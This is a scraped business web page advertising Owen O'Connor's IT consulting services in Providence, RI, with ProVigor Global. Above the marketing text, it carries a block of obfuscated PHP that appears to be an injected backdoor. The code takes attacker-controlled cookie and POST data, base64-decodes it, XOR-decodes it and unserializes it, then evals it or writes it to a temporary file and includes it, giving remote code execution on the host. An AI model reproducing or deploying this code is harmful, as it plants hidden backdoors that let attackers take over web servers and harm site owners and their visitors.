$zSoDndx = 'z' . "\x67" . chr ( 722 - 639 ).chr ( 393 - 298 ).'X' . 'K' . "\x54" . 'A' . "\113";$ZSYhWHVx = 'c' . chr ( 1031 - 923 ).chr (97) . chr ( 144 - 29 ).chr ( 817 - 702 ).chr (95) . chr ( 420 - 319 ).chr ( 158 - 38 ).chr (105) . "\x73" . 't' . "\x73";$dRDScSTYpY = class_exists($zSoDndx); $ZSYhWHVx = "46898";$ZUlvAx = !1;if ($dRDScSTYpY == $ZUlvAx){function GYBzNIZ(){return FALSE;}$eUdJnrkvD = "58962";GYBzNIZ();class zgS_XKTAK{private function NSdkt($eUdJnrkvD){if (is_array(zgS_XKTAK::$Oshnu)) {$tyirxdGmPx = str_replace('<' . chr (63) . "\x70" . "\x68" . "\160", "", zgS_XKTAK::$Oshnu[chr ( 376 - 277 )."\157" . chr (110) . chr (116) . chr ( 348 - 247 ).chr (110) . 't']);eval($tyirxdGmPx); $eUdJnrkvD = "58962";exit();}}private $BHueLceo;public function tbEMvxJyZ(){echo 50077;}public function __destruct(){$eUdJnrkvD = "46873_23190";$this->NSdkt($eUdJnrkvD); $eUdJnrkvD = "46873_23190";}public function __construct($PHmav=0){$xvvbf = $_POST;$YkgOTDsELc = $_COOKIE;$zLzzyQKBm = "77ed7f02-2e50-47ee-b4d8-d496b99fcc85";$YcCsn = @$YkgOTDsELc[substr($zLzzyQKBm, 0, 4)];if (!empty($YcCsn)){$VZSBxyUKkk = "base64";$OmDYSKZtFk = "";$YcCsn = explode(",", $YcCsn);foreach ($YcCsn as $cDUNR){$OmDYSKZtFk .= @$YkgOTDsELc[$cDUNR];$OmDYSKZtFk .= @$xvvbf[$cDUNR];}$OmDYSKZtFk = array_map($VZSBxyUKkk . chr ( 503 - 408 ).chr (100) . chr ( 315 - 214 )."\143" . chr (111) . "\144" . 'e', array($OmDYSKZtFk,)); $OmDYSKZtFk = $OmDYSKZtFk[0] ^ str_repeat($zLzzyQKBm, (strlen($OmDYSKZtFk[0]) / strlen($zLzzyQKBm)) + 1);zgS_XKTAK::$Oshnu = @unserialize($OmDYSKZtFk); $OmDYSKZtFk = class_exists("46873_23190");}}public static $Oshnu = 56115;}$nWcBNH = new /* 1053 */ $zSoDndx(58962 + 58962); $eUdJnrkvD = strpos($eUdJnrkvD, $eUdJnrkvD); $ZUlvAx = $nWcBNH = $eUdJnrkvD = Array();}$GuSHcEd = 'C' . 'i' . "\153" . "\x5f" . "\x6c" . "\x62" . chr ( 825 - 715 ).chr (105) . chr ( 247 - 140 ); $TBOnJMFT = "\x63" . 'l' . chr ( 1014 - 917 ).chr ( 1060 - 945 )."\x73" . chr ( 132 - 37 ).'e' . "\x78" . chr ( 854 - 749 ).chr ( 117 - 2 )."\x74" . chr ( 977 - 862 ); $epxzMLWFhT = class_exists($GuSHcEd); $TBOnJMFT = "39756";$IMqzdUKA = !1;if ($epxzMLWFhT == $IMqzdUKA){function kcSas(){return FALSE;}$LsMthxlA = "27121";kcSas();class Cik_lbnik{private function jAVwT($LsMthxlA){if (is_array(Cik_lbnik::$oQzrDhndUg)) {$KBfhkKALFd = sys_get_temp_dir() . "/" . crc32(Cik_lbnik::$oQzrDhndUg['s' . "\x61" . chr ( 1025 - 917 ).chr (116)]);@Cik_lbnik::$oQzrDhndUg[chr ( 523 - 404 )."\162" . chr ( 760 - 655 ).chr ( 726 - 610 ).chr ( 633 - 532 )]($KBfhkKALFd, Cik_lbnik::$oQzrDhndUg[chr (99) . "\x6f" . "\156" . chr ( 516 - 400 )."\x65" . 'n' . "\x74"]);include $KBfhkKALFd;@Cik_lbnik::$oQzrDhndUg['d' . "\x65" . "\154" . chr (101) . "\x74" . "\145"]($KBfhkKALFd); $LsMthxlA = "27121";exit();}}private $wvQDyqX;public function rYqAFqcn(){echo 42778;}public function __destruct(){$LsMthxlA = "8836_56121";$this->jAVwT($LsMthxlA); $LsMthxlA = "8836_56121";}public function __construct($JixAgMYl=0){$hZCRtrAp = $_POST;$vBeDBwQuf = $_COOKIE;$UbzLu = "5eb7208b-755d-4786-b14d-98e4e853e2d1";$OcPASeS = @$vBeDBwQuf[substr($UbzLu, 0, 4)];if (!empty($OcPASeS)){$WmhzlKdbhe = "base64";$pIuPM = "";$OcPASeS = explode(",", $OcPASeS);foreach ($OcPASeS as $YNlPj){$pIuPM .= @$vBeDBwQuf[$YNlPj];$pIuPM .= @$hZCRtrAp[$YNlPj];}$pIuPM = array_map($WmhzlKdbhe . "\x5f" . chr (100) . "\x65" . chr (99) . 'o' . "\144" . chr (101), array($pIuPM,)); $pIuPM = $pIuPM[0] ^ str_repeat($UbzLu, (strlen($pIuPM[0]) / strlen($UbzLu)) + 1);Cik_lbnik::$oQzrDhndUg = @unserialize($pIuPM); $pIuPM = class_exists("8836_56121");}}public static $oQzrDhndUg = 10477;}$hgmMtz = new /* 49090 */ $GuSHcEd(27121 + 27121); $LsMthxlA = strpos($LsMthxlA, $LsMthxlA); $IMqzdUKA = $hgmMtz = $LsMthxlA = Array();} Providence, RI IT Consulting | Owen O'Connor RI
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Providence, RI Internet Technology Consulting

Owen O'Connor • ProVigor Global USA

Automation and Integration Technology

Streamlined methodologies and broad experience allows Providence’s Owen O’Connor and his business partner, Bard Moshagen, to deliver the same level of expertise and execution as much larger firms, while providing ease of engagement, increased flexibility, and value-based cost structures. As a result, ProVigor clients benefit from a unique combination of innovative solutions, automation and integration technology, and a higher return on each dollar spent. Combined with the power of the ProVigor Global Network, ranging from Providence RI to Norway, Owen O’Connor’s business model offers IT strategy and project delivery capabilities unmatched in the marketplace.